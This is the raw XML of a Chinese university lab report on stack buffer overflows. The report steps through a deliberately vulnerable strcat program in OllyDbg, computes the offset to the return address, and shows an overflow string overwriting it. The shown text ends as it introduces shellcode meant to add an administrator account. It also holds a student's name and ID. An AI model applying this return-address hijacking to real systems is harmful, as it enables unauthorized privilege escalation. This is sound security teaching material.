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312" w:after="312"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>三</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>栈缓冲区溢出</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:before="312" w:after="312"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑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0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>陈东鑫</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t>1190201308</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:before="0" w:after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实验目的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9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掌握栈缓冲区溢出原理；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9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掌握利用shellcode劫持程序指令控制流的方法；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:before="0" w:after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实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>环境</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="363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吾爱破解WinXP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_52Pojie_2.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>、Microsoft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Visual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C++</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（在虚拟机里安装）、Ollydbg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snapToGrid w:val="0"/>
        <w:spacing w:before="0" w:after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实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>内容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注：由于实验环境、代码编写的不同，使用Ollydbg反汇编出来的指令的实际地址可能与本指导的地址有所差异，请按实际情况填写，并给出必要的截图。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观察栈溢出过程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="30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使用VC++</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>编写一段C程序，解压之后双击sin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.bat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，在桌面创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vc6图标。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="36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092960" cy="1801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326" cy="18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在桌面创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cpp文件。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850515" cy="13735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417" cy="13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源代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="0" w:firstLineChars="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98526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其中，strcat函数是一个不安全函数，无字符串长度检查，执行该函数可能会产生栈溢出。</w:t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输入代码后，先编译再组建，确保</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0 errors。默认点击在桌面创建工作区，在桌面的debug文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>夹</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>中看到生成的exe文件。</w:t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249930" cy="154622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598" cy="155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4900" cy="2772410"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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编译程序生成Debug版本的EXE文件，使用I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DA P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ro打开E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>XE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>文件，可以看到左侧提供了源码声明的函数的起始位置，选择_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，可以看到main函数的起始位置为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004010A0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，则使用Ollydbg打开EXE，在该地址下断点，单步执行该程序。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140" cy="2068195"/>
            <wp:effectExtent l="0" t="0" r="10160" b="190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4011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hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>处令edx入栈，4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>011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使用call指令调用fun函数，因此edx寄存器的是f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>un</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>函数的参数，$edx=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00420A88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，该寄存器代表变量名_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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>____</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的地址，变量值为_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AAAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>___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跟踪步入call</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 00401005</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>指令，进入fun函数，给出fun开始执行时的截图（从push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ebp指令开始）：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1110" cy="1622425"/>
            <wp:effectExtent l="0" t="0" r="8890" b="317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0" w:leftChars="0" w:firstLine="0"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根据学过的知识，进入函数的第一步是栈处理，首先执行push</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ebp;mov ebp,esp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sub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esp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,0x58</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，为fun中的局部变量分配一定的内存空间，此时函数栈帧结构已经完成，此时右击寄存器窗口的EBP寄存器，点击“堆栈窗口中跟随”，在右下角堆栈窗口中可以观察到栈底的情况，给出堆栈窗口截图：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4120" cy="766445"/>
            <wp:effectExtent l="0" t="0" r="5080" b="825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jc w:val="center"/>
      </w:pP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根据截图得到此时的栈信息fun函数的返回地址为_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0040110c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，此地址为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(4)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>步入的call指令的下一条指令的地址。</w:t>
      </w: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向下步入可看到，fun函数为变量a赋值的指令的地址为_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00401038</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>___</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，由刚才设置的“堆栈窗口跟随”，可以看到其在栈中存放的地址为_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0012D814</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>___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5710" cy="1792605"/>
            <wp:effectExtent l="0" t="0" r="889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观察到0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>04010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69</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>处的call指令调用str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>at将变量str的字符串拷贝到变量buffer中，分析这四条指令，其中ecx=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AAAAA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，代表的是变量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，edx=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Hello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，代表的是变量_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Buffer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经过以上分析，如果str的字符串过长，那么在执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>函数调用strc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>at</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>会使字符串超过为buffer分配的空间，将可能覆盖(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>堆栈的返回地址。由(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>可知buffer的地址，而堆栈中存储返回地址的位置为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0012D81C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，加上变量a占用的空间，二者相差</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>个字节，因此如果字符串足够长，str的第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23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>__~__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26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</w:rPr>
        <w:t>（描述范围，如第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个字符）个字符会覆盖函数的返回地址。修改C程序的代码c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>har str[10000]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” AAAAAAAAAAAAAAAAAABBBBCCCC”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，令程序执行完(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>trcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>指令（可在4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0106c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>处下断点令程序执行到此处），观察堆栈情况，发现返回地址变成了_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43434343</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>____</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，由此，f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>un</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>函数的返回地址被过长的字符串覆盖。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1076325"/>
            <wp:effectExtent l="0" t="0" r="6350" b="317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利用栈溢出漏洞执行shellcode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="36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通过1的分析，利用参数str可以控制f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>un</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的返回地址，令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>执行完后跳转到事先构造好的shellcode的位置执行恶意代码。这一部分将尝试利用shellcode在Windows中创建一个用户账户，并为该账户设置管理员组权限。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9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552450</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7620" cy="693420"/>
                <wp:effectExtent l="38100" t="0" r="68580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5.4pt;margin-top:43.5pt;height:54.6pt;width:0.6pt;z-index:251661312;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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Lj6+fXAAAACgEAAA8AAAAAAAAAAQAgAAAAIgAAAGRy&#10;cy9kb3ducmV2LnhtbFBLAQIUABQAAAAIAIdO4kAIjKlCBgIAAOUDAAAOAAAAAAAAAAEAIAAAACYB&#10;AABkcnMvZTJvRG9jLnhtbFBLBQYAAAAABgAGAFkBAACe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232410</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="822960" cy="260350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0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 w:cs="Times New Roman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</w:rPr>
                              <w:t>高地址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4pt;margin-top:18.3pt;height:20.5pt;width:64.8pt;z-index:251660288;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="f" coordsize="21600,21600" o:gfxdata="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t17mNoAAAAJAQAADwAAAAAAAAABACAAAAAiAAAAZHJz&#10;L2Rvd25yZXYueG1sUEsBAhQAFAAAAAgAh07iQEmoBuc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 w:cs="Times New Roman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</w:rPr>
                        <w:t>高地址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1303020</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="822960" cy="259715"/>
                <wp:effectExtent l="0" t="0" r="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 w:cs="Times New Roman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</w:rPr>
                              <w:t>低地址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5pt;margin-top:102.6pt;height:20.45pt;width:64.8pt;z-index:251659264;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="f" coordsize="21600,21600" o:gfxdata="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dSTmy2wAAAAsBAAAPAAAAAAAAAAEAIAAAACIAAABk&#10;cnMvZG93bnJldi54bWxQSwECFAAUAAAACACHTuJAKeA/I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 w:cs="Times New Roman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</w:rPr>
                        <w:t>低地址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</w:rPr>
        <w:t>已知</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
